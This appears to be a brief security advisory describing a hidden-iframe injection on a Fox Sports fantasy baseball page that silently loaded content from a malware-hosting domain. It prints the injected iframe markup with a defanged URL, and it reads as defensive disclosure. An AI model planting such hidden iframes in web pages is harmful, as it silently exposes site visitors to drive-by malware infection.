The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.
The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.
The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.
<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.
The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same.